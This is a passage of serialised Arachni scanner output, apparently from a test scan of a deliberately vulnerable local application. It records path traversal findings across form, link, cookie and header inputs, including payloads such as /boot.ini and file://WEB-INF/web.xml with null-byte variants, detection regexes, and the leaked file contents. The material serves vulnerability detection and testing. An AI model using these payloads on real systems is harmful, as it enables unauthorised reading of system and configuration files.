  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/windows/form/with_null
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "189"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    injected: !binary |
      L2Jvb3QuaW5pAC5odG1s

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: POST
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /boot.ini
      :altered: input
      :element: form
      :params: 
        input: !binary |
          L2Jvb3QuaW5pAC5odG1s

      :follow_location: true
      :injected: !binary |
        L2Jvb3QuaW5pAC5odG1s

      :combo: 
        input: !binary |
          L2Jvb3QuaW5pAC5odG1s

      :action: http://localhost:11084/windows/form/with_null
      :verification: false
      :id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      [boot loader]
      timeout=30
      default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
      [operating systems]
      multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/windows/form/with_null
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: link
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/windows/link/straight?input=default.html
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "189"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    injected: /boot.ini
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /boot.ini
      :altered: input
      :element: link
      :params: 
        input: /boot.ini
      :follow_location: true
      :injected: /boot.ini
      :combo: 
        input: /boot.ini
      :action: http://localhost:11084/windows/link/straight?input=default.html
      :verification: false
      :id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      [boot loader]
      timeout=30
      default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
      [operating systems]
      multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/windows/link/straight?input=default.html
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: link
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/windows/link/with_null?input=default.html
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "189"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    injected: !binary |
      L2Jvb3QuaW5pAC5odG1s

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /boot.ini
      :altered: input
      :element: link
      :params: 
        input: !binary |
          L2Jvb3QuaW5pAC5odG1s

      :follow_location: true
      :injected: !binary |
        L2Jvb3QuaW5pAC5odG1s

      :combo: 
        input: !binary |
          L2Jvb3QuaW5pAC5odG1s

      :action: http://localhost:11084/windows/link/with_null?input=default.html
      :verification: false
      :id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      [boot loader]
      timeout=30
      default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
      [operating systems]
      multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/windows/link/with_null?input=default.html
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: cookie
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/windows/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=/boot.ini
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "189"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    injected: /boot.ini
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /boot.ini
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: /boot.ini
      :injected: /boot.ini
      :combo: 
        cookie: /boot.ini
      :action: http://localhost:11084/windows/cookie/straight
      :verification: false
      :id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      [boot loader]
      timeout=30
      default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
      [operating systems]
      multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/windows/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: header
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/windows/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: !binary |
          L2Jvb3QuaW5pAC4=

        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "189"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    injected: !binary |
      L2Jvb3QuaW5pAC4=

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: /boot.ini
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: !binary |
          L2Jvb3QuaW5pAC4=

      :injected: !binary |
        L2Jvb3QuaW5pAC4=

      :combo: 
        User-Agent: !binary |
          L2Jvb3QuaW5pAC4=

      :action: http://localhost:11084/windows/header/straight
      :verification: false
      :id: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?mi-x:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      [boot loader]
      timeout=30
      default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
      [operating systems]
      multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/windows/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: form
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: POST
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/tomcat/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1786"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <web-app
    injected: file://WEB-INF/web.xml
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: POST
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:<web-app)
      :match: <web-app
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file://WEB-INF/web.xml
      :altered: input
      :element: form
      :params: 
        input: file://WEB-INF/web.xml
      :follow_location: true
      :injected: file://WEB-INF/web.xml
      :combo: 
        input: file://WEB-INF/web.xml
      :action: http://localhost:11084/tomcat/form/straight
      :verification: false
      :id: <web-app
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?i-mx:<web-app)
    regexp_match: <web-app
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      <?xml version="1.0" encoding="UTF-8"?>
      <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
        <display-name>VulnerabilityDetectionChallenge</display-name>
        <welcome-file-list>
          <welcome-file>index.html</welcome-file>
          <welcome-file>index.htm</welcome-file>
          <welcome-file>index.jsp</welcome-file>
          <welcome-file>default.html</welcome-file>
          <welcome-file>default.htm</welcome-file>
          <welcome-file>default.jsp</welcome-file>
        </welcome-file-list>
      
        <!-- Define a Security Constraint on this Application -->
        <security-constraint>
          <web-resource-collection>
           <web-resource-name>Weak authentication - basic</web-resource-name>
           <url-pattern>/passive/session/weak-authentication-basic.jsp</url-pattern>
          </web-resource-collection>
          <auth-constraint>
           <role-name>tomcat</role-name>
           <role-name>role1</role-name>
          </auth-constraint>
        </security-constraint>
      
        <!-- Define the Login Configuration for this Application -->
        <login-config>
          <auth-method>BASIC</auth-method>
          <realm-name>Application</realm-name>
          <!--realm-name>Weak authentication - basic</realm-name-->
        </login-config>
      
        <!-- Security roles referenced by this web application -->
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>tomcat</role-name>
        </security-role>
      
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>role1</role-name>
        </security-role>

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/tomcat/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: form
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: POST
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/tomcat/form/with_null
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1786"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <web-app
    injected: !binary |
      ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: POST
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:<web-app)
      :match: <web-app
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file://WEB-INF/web.xml
      :altered: input
      :element: form
      :params: 
        input: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

      :follow_location: true
      :injected: !binary |
        ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

      :combo: 
        input: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

      :action: http://localhost:11084/tomcat/form/with_null
      :verification: false
      :id: <web-app
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?i-mx:<web-app)
    regexp_match: <web-app
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      <?xml version="1.0" encoding="UTF-8"?>
      <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
        <display-name>VulnerabilityDetectionChallenge</display-name>
        <welcome-file-list>
          <welcome-file>index.html</welcome-file>
          <welcome-file>index.htm</welcome-file>
          <welcome-file>index.jsp</welcome-file>
          <welcome-file>default.html</welcome-file>
          <welcome-file>default.htm</welcome-file>
          <welcome-file>default.jsp</welcome-file>
        </welcome-file-list>
      
        <!-- Define a Security Constraint on this Application -->
        <security-constraint>
          <web-resource-collection>
           <web-resource-name>Weak authentication - basic</web-resource-name>
           <url-pattern>/passive/session/weak-authentication-basic.jsp</url-pattern>
          </web-resource-collection>
          <auth-constraint>
           <role-name>tomcat</role-name>
           <role-name>role1</role-name>
          </auth-constraint>
        </security-constraint>
      
        <!-- Define the Login Configuration for this Application -->
        <login-config>
          <auth-method>BASIC</auth-method>
          <realm-name>Application</realm-name>
          <!--realm-name>Weak authentication - basic</realm-name-->
        </login-config>
      
        <!-- Security roles referenced by this web application -->
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>tomcat</role-name>
        </security-role>
      
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>role1</role-name>
        </security-role>

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/tomcat/form/with_null
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: link
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/tomcat/link/straight?input=default.html
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1786"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <web-app
    injected: file://WEB-INF/web.xml
    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:<web-app)
      :match: <web-app
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file://WEB-INF/web.xml
      :altered: input
      :element: link
      :params: 
        input: file://WEB-INF/web.xml
      :follow_location: true
      :injected: file://WEB-INF/web.xml
      :combo: 
        input: file://WEB-INF/web.xml
      :action: http://localhost:11084/tomcat/link/straight?input=default.html
      :verification: false
      :id: <web-app
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?i-mx:<web-app)
    regexp_match: <web-app
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      <?xml version="1.0" encoding="UTF-8"?>
      <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
        <display-name>VulnerabilityDetectionChallenge</display-name>
        <welcome-file-list>
          <welcome-file>index.html</welcome-file>
          <welcome-file>index.htm</welcome-file>
          <welcome-file>index.jsp</welcome-file>
          <welcome-file>default.html</welcome-file>
          <welcome-file>default.htm</welcome-file>
          <welcome-file>default.jsp</welcome-file>
        </welcome-file-list>
      
        <!-- Define a Security Constraint on this Application -->
        <security-constraint>
          <web-resource-collection>
           <web-resource-name>Weak authentication - basic</web-resource-name>
           <url-pattern>/passive/session/weak-authentication-basic.jsp</url-pattern>
          </web-resource-collection>
          <auth-constraint>
           <role-name>tomcat</role-name>
           <role-name>role1</role-name>
          </auth-constraint>
        </security-constraint>
      
        <!-- Define the Login Configuration for this Application -->
        <login-config>
          <auth-method>BASIC</auth-method>
          <realm-name>Application</realm-name>
          <!--realm-name>Weak authentication - basic</realm-name-->
        </login-config>
      
        <!-- Security roles referenced by this web application -->
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>tomcat</role-name>
        </security-role>
      
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>role1</role-name>
        </security-role>

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/tomcat/link/straight?input=default.html
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: link
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/tomcat/link/with_null?input=default.html
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1786"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <web-app
    injected: !binary |
      ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:<web-app)
      :match: <web-app
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file://WEB-INF/web.xml
      :altered: input
      :element: link
      :params: 
        input: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

      :follow_location: true
      :injected: !binary |
        ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

      :combo: 
        input: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAuaHRtbA==

      :action: http://localhost:11084/tomcat/link/with_null?input=default.html
      :verification: false
      :id: <web-app
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
